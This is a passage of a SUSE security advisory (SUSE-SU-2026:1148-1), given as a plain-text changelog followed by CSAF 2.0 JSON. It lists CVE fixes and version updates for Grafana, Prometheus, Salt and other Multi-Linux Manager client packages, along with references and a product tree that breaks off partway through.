* Alerting: Fix group interval override when adding new rules
* Azure: Fix legend formatting
* Azure: Fix resource name determination in template variable
queries
* Graphite: Fix annotation queries
* Graphite: Fix date mutation
* Graphite: Fix nested variable interpolation for repeated rows
- Update to version 11.6.3:
* Fixes CVE-2025-3415
- Update to version 11.6.2:
* Dashboard: Fixes issue with row repeats and first row
* Graphite: Ensure template variables are interpolated correctly
* Graphite: Fix Graphite series interpolation
* Prometheus: Fix semver import path
- Update to version 11.6.1:
* DashboardScenePage: Correct slug in self referencing data links
* GrafanaUI: Use safePolygon close handler for interactive
tooltips instead of a delay
* Prometheus: Add support for cloud partners Prometheus data
sources
* Alertmanager: Add Role-Based Access Control via reqAction Field
* GrafanaUI: Remove blurred background from overlay backdrops to
improve performance
* InfluxDB: Fix nested variable interpolation
* LDAP test: Fix page crash
* Org redirection: Fix linking between orgs
- Upgrade to version 11.6.0:
* Visualisations: One click links and actions
* Annotations: Add cron syntax support
* WebGL-powered geomaps for better performance
* Alerting: Add alert rule version history
* API keys: Migrate API keys to service accounts at startup
mgr-push:
- Version 5.2.3-0
* Disable build for SLES 16
rhnlib:
- Version 5.2.4-0
* Disable build for SLES 16
spacecmd:
- Version 5.2.6-0
* Update translation strings
spacewalk-client-tools:
- Version 5.2.4-0
* Disable build for SLES 16
uyuni-common-libs:
- Version 5.2.3-0
* Disable build for SLES 16
uyuni-tools:
- Version 5.2.5-0
* Remove migrate command
* Remove template script from mgradm: use the one in the image
* Split the TFTP server into a separate container
* Explicitly start proxy pods after operations
(bsc#1258015)
* Adjust mgrctl server filter to work with the new helm chart
labels
* Remove hub register command
* Remove the Kubernetes install and upgrade from mgrpxy
* Optimize postgres migration disk space usage (bsc#1257447)
venv-salt-minion:
- Fix the issue preventing SELinux profile to be loaded on SLES 16
deployed using cloud images (bsc#1258957)
- Fix the typo causing buiding EL9 bundle without binary dependencies
- Backport security patches for Salt vendored tornado:
* CVE-2025-67724: missing validation of supplied reason phrase (bsc#1254903)
* CVE-2025-67725: fix DoS via malicious HTTP request (bsc#1254905)
* CVE-2025-67726: fix HTTP header parameter parsing algorithm (bsc#1254904)
- CVE-2025-62349: Add minimum_auth_version to enforce security (bsc#1254257)
- CVE-2025-62348: Junos module yaml loader fix (bsc#1254256)
Multi-Linux-ManagerTools-Beta-SLE-Micro-release:
- Make the product installable on all SLE Micro 5 family
Patchnames: SUSE-2026-1148,SUSE-MultiLinuxManagerTools-Beta-SLE-15-2026-1148,SUSE-MultiLinuxManagerTools-Beta-SLE-Micro-5-2026-1148
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
4.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.1 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.2 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
9.8 (Critical)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
8.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security Beta update 5.2.0 Beta1 for Multi-Linux Manager Client Tools",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\ngolang-github-prometheus-prometheus:\n\n- CVE-2026-27606: Fix arbitrary file write via path traversal in\n rollup (bsc#1258893)\n * Bump rollup to version 4.59.0\n- Drop SLE 12 support (jsc#PED-15474)\n- CVE-2026-25547: Fix unbounded brace range expansion leading to\n excessive CPU and memory consumption (bsc#1257841):\n * Bump brace-expansion to version 5.0.2\n- Do not build old web UI. Fixes following security\n vulnerabilities:\n * CVE-2026-1615: jsonpath: arbitrary code injection due to unsafe\n evaluation of user-supplied JSON Path expressions (bsc#1257897)\n * CVE-2025-61140: jsonpath: the `value` function is vulnerable to\n prototype pollution (bsc#1257442)\n- Set source URL in the spec file and drop tar service\n\ngrafana:\n\n- Drop support for SLE 12 (jsc#PED-15474)\n- Update to version 11.6.11:\n Features and enhancements:\n * Alerting: Add limits for the size of expanded notification\n templates\n * Correlations: Remove support for org_id=0\n Security:\n * CVE-2026-21722: Public dashboards annotations: use dashboard\n timerange if time selection disabled (bsc#1258136)\n- Update to version 11.6.10:\n * API: Add missing scope check on dashboards\n * Avatar: Require sign-in, remove queue, respect timeout\n Bug fixes:\n * Alerting: Fix a race condition panic in ResetStateByRuleUID\n- Update to version 11.6.9:\n * Plugins: Add PluginContext to plugins when scenes is disabled\n * Alerting: Fix contacts point issues\n- Update to version 11.6.8:\n * Alerting: Fix unmarshalling of GettableStatus to include time\n intervals\n- Update to version 11.6.7:\n * Auth: Fix render user OAuth passthrough\n * LDAP Authentication: Fix URL to propagate username context as\n parameter\n * Plugins: Dependencies do not inherit parent URL for preinstall\n * URLParams: Stringify true values as key=true always (fixes\n issues with variables with true value)\n- Update to version 11.6.6:\n * Alerting: Fix copying of recording rule fields\n * Fix redirection after login when Grafana is served from subpath\n- Update to version 11.6.5:\n * Alerting: Bump alerting package to include change to\n NewTLSClient\n- Update to version 11.6.4:\n * StateTimeline: Add endTime to tooltip\n * Unified storage: Respect GF_DATABASE_URL override\n * Alerting: Fix group interval override when adding new rules\n * Azure: Fix legend formatting\n * Azure: Fix resource name determination in template variable\n queries\n * Graphite: Fix annotation queries\n * Graphite: Fix date mutation\n * Graphite: Fix nested variable interpolation for repeated rows\n- Update to version 11.6.3:\n * Fixes CVE-2025-3415\n- Update to version 11.6.2:\n * Dashboard: Fixes issue with row repeats and first row\n * Graphite: Ensure template variables are interpolated correctly\n * Graphite: Fix Graphite series interpolation\n * Prometheus: Fix semver import path\n- Update to version 11.6.1:\n * DashboardScenePage: Correct slug in self referencing data links\n * GrafanaUI: Use safePolygon close handler for interactive\n tooltips instead of a delay\n * Prometheus: Add support for cloud partners Prometheus data\n sources\n * Alertmanager: Add Role-Based Access Control via reqAction Field\n * GrafanaUI: Remove blurred background from overlay backdrops to\n improve performance\n * InfluxDB: Fix nested variable interpolation\n * LDAP test: Fix page crash\n * Org redirection: Fix linking between orgs\n- Upgrade to version 11.6.0:\n * Visualisations: One click links and actions\n * Annotations: Add cron syntax support\n * WebGL-powered geomaps for better performance\n * Alerting: Add alert rule version history\n * API keys: Migrate API keys to service accounts at startup\n\nmgr-push:\n\n- Version 5.2.3-0\n * Disable build for SLES 16\n\nrhnlib:\n\n- Version 5.2.4-0\n * Disable build for SLES 16\n\nspacecmd:\n\n- Version 5.2.6-0\n * Update translation strings\n\nspacewalk-client-tools:\n\n- Version 5.2.4-0\n * Disable build for SLES 16\n\nuyuni-common-libs:\n\n- Version 5.2.3-0\n * Disable build for SLES 16\n\nuyuni-tools:\n\n- Version 5.2.5-0\n * Remove migrate command\n * Remove template script from mgradm: use the one in the image\n * Split the TFTP server into a separate container\n * Explicitly start proxy pods after operations\n (bsc#1258015)\n * Adjust mgrctl server filter to work with the new helm chart\n labels\n * Remove hub register command\n * Remove the Kubernetes install and upgrade from mgrpxy\n * Optimize postgres migration disk space usage (bsc#1257447)\n\nvenv-salt-minion:\n\n- Fix the issue preventing SELinux profile to be loaded on SLES 16\n deployed using cloud images (bsc#1258957)\n- Fix the typo causing buiding EL9 bundle without binary dependencies\n- Backport security patches for Salt vendored tornado:\n * CVE-2025-67724: missing validation of supplied reason phrase (bsc#1254903)\n * CVE-2025-67725: fix DoS via malicious HTTP request (bsc#1254905)\n * CVE-2025-67726: fix HTTP header parameter parsing algorithm (bsc#1254904)\n- CVE-2025-62349: Add minimum_auth_version to enforce security (bsc#1254257)\n- CVE-2025-62348: Junos module yaml loader fix (bsc#1254256)\n \nMulti-Linux-ManagerTools-Beta-SLE-Micro-release:\n - Make the product installable on all SLE Micro 5 family",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1148,SUSE-MultiLinuxManagerTools-Beta-SLE-15-2026-1148,SUSE-MultiLinuxManagerTools-Beta-SLE-Micro-5-2026-1148",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1148-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1148-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261148-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1148-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025055.html"
},
{
"category": "self",
"summary": "SUSE Bug 1254256",
"url": "https://bugzilla.suse.com/1254256"
},
{
"category": "self",
"summary": "SUSE Bug 1254257",
"url": "https://bugzilla.suse.com/1254257"
},
{
"category": "self",
"summary": "SUSE Bug 1254903",
"url": "https://bugzilla.suse.com/1254903"
},
{
"category": "self",
"summary": "SUSE Bug 1254904",
"url": "https://bugzilla.suse.com/1254904"
},
{
"category": "self",
"summary": "SUSE Bug 1254905",
"url": "https://bugzilla.suse.com/1254905"
},
{
"category": "self",
"summary": "SUSE Bug 1257442",
"url": "https://bugzilla.suse.com/1257442"
},
{
"category": "self",
"summary": "SUSE Bug 1257447",
"url": "https://bugzilla.suse.com/1257447"
},
{
"category": "self",
"summary": "SUSE Bug 1257841",
"url": "https://bugzilla.suse.com/1257841"
},
{
"category": "self",
"summary": "SUSE Bug 1257897",
"url": "https://bugzilla.suse.com/1257897"
},
{
"category": "self",
"summary": "SUSE Bug 1258015",
"url": "https://bugzilla.suse.com/1258015"
},
{
"category": "self",
"summary": "SUSE Bug 1258136",
"url": "https://bugzilla.suse.com/1258136"
},
{
"category": "self",
"summary": "SUSE Bug 1258893",
"url": "https://bugzilla.suse.com/1258893"
},
{
"category": "self",
"summary": "SUSE Bug 1258957",
"url": "https://bugzilla.suse.com/1258957"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-3415 page",
"url": "https://www.suse.com/security/cve/CVE-2025-3415/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61140 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61140/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-67724 page",
"url": "https://www.suse.com/security/cve/CVE-2025-67724/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-67725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-67725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-67726 page",
"url": "https://www.suse.com/security/cve/CVE-2025-67726/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-1615 page",
"url": "https://www.suse.com/security/cve/CVE-2026-1615/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21722 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21722/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-25547 page",
"url": "https://www.suse.com/security/cve/CVE-2026-25547/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27606/"
}
],
"title": "Security Beta update 5.2.0 Beta1 for Multi-Linux Manager Client Tools",
"tracking": {
"current_release_date": "2026-03-30T11:21:20Z",
"generator": {
"date": "2026-03-30T11:21:20Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1148-1",
"initial_release_date": "2026-03-30T11:21:20Z",
"revision_history": [
{
"date": "2026-03-30T11:21:20Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"product": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"product_id": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64"
}
},
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"product": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"product_id": "firewalld-prometheus-config-0.1-159000.4.3.2.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"product": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"product_id": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"product_id": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-159000.2.3.2.aarch64",
"product": {
"name": "grafana-11.6.11-159000.2.3.2.aarch64",
"product_id": "grafana-11.6.11-159000.2.3.2.aarch64"
}
},
{
"category": "product_version",
"name": "mgrctl-5.2.5-159000.2.3.2.aarch64",
"product": {
"name": "mgrctl-5.2.5-159000.2.3.2.aarch64",
"product_id": "mgrctl-5.2.5-159000.2.3.2.aarch64"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"product_id": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"product": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"product_id": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"product": {
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"product_id": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"product": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"product_id": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64"
}
},
{
"category": "product_version",
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.aarch64",
"product": {
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.aarch64",
"product_id": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.aarch64"
}
},
{
"category": "product_version",
"name": "venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"product": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"product_id": "venv-salt-minion-3006.0-159000.5.3.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"product": {
"name": "dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"product_id": "dracut-saltboot-1.1.0-159000.2.2.1.noarch"
}
},
{
"category": "product_version",
"name": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"product": {
"name": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"product_id": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch"
}
},
{
"category": "product_version",
"name": "mgr-push-5.2.3-159000.2.3.1.noarch",
"product": {
"name": "mgr-push-5.2.3-159000.2.3.1.noarch",
"product_id": "mgr-push-5.2.3-159000.2.3.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"product": {
"name": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"product_id": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"product": {
"name": "mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"product_id": "mgrctl-lang-5.2.5-159000.2.3.2.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"product": {
"name": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"product_id": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch"
}
},
{
"category": "product_version",
"name": "python2-defusedxml-0.7.1-159000.4.2.1.noarch",
"product": {
"name": "python2-defusedxml-0.7.1-159000.4.2.1.noarch",
"product_id": "python2-defusedxml-0.7.1-159000.4.2.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"product": {
"name": "python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"product_id": "python3-defusedxml-0.7.1-159000.4.2.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"product": {
"name": "python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"product_id": "python3-mgr-push-5.2.3-159000.2.3.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"product": {
"name": "python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"product_id": "python3-rhnlib-5.2.4-159000.4.3.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"product": {
"name": "python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"product_id": "python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch"
}
},
{
"category": "product_version",
"name": "saltbundlepy-m2crypto-doc-0.45.1-159000.4.3.1.noarch",
"product": {
"name": "saltbundlepy-m2crypto-doc-0.45.1-159000.4.3.1.noarch",
"product_id": "saltbundlepy-m2crypto-doc-0.45.1-159000.4.3.1.noarch"
}
},
{
"category": "product_version",
"name": "spacecmd-5.2.6-159000.4.3.1.noarch",
"product": {
"name": "spacecmd-5.2.6-159000.4.3.1.noarch",
"product_id": "spacecmd-5.2.6-159000.4.3.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"product": {
"name": "spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"product_id": "spacewalk-client-tools-5.2.4-159000.4.3.1.noarch"
}
},
{
"category": "product_version",
"name": "supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"product": {
"name": "supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"product_id": "supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch"
}
},
{
"category": "product_version",
"name": "supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"product": {
"name": "supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"product_id": "supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"product": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"product_id": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le"
}
},
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"product": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"product_id": "firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"product": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"product_id": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"product_id": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-159000.2.3.2.ppc64le",
"product": {
"name": "grafana-11.6.11-159000.2.3.2.ppc64le",
"product_id": "grafana-11.6.11-159000.2.3.2.ppc64le"
}
},
{
"category": "product_version",
"name": "mgrctl-5.2.5-159000.2.3.2.ppc64le",
"product": {
"name": "mgrctl-5.2.5-159000.2.3.2.ppc64le",
"product_id": "mgrctl-5.2.5-159000.2.3.2.ppc64le"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"product_id": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"product": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"product_id": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"product": {
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"product_id": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"product": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"product_id": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le"
}
},
{
"category": "product_version",
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.ppc64le",
"product": {
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.ppc64le",
"product_id": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.ppc64le"
}
},
{
"category": "product_version",
"name": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"product": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"product_id": "venv-salt-minion-3006.0-159000.5.3.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"product": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"product_id": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x"
}
},
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"product": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"product_id": "firewalld-prometheus-config-0.1-159000.4.3.2.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"product": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"product_id": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"product_id": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x"
}
},
{
"category": "product_version",
